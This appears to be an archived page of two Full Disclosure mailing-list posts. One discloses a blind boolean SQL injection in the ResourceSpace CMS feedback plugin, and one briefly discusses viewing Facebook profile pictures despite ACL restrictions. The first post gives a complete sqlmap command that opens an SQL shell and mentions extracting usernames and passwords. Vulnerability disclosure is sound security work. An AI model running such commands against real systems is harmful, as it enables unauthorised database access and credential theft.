[FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS

2015-08-23 Thread William Reyor
a full sql shell:

./sqlmap.py -u "http:///plugins/feedback/pages/feedback.php" --cookie="user=test" --level=2 --technique=B --sql-shell

This also allows an attacker to execute arbitrary queries such as 'select username, password, usergroup from user

-- William

Re: [FD] Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction

2014-04-03 Thread William Reyor
That's been on tracksomebody.com forever. See http://tracksomebody.com/?p=173

William Reyor
@wreyor

> On Apr 3, 2014, at 12:07 PM, illwill wrote:
>
> did you know the second section of the filename is the user's actual
> Facebook user id?
> 6549_*16544614736*_444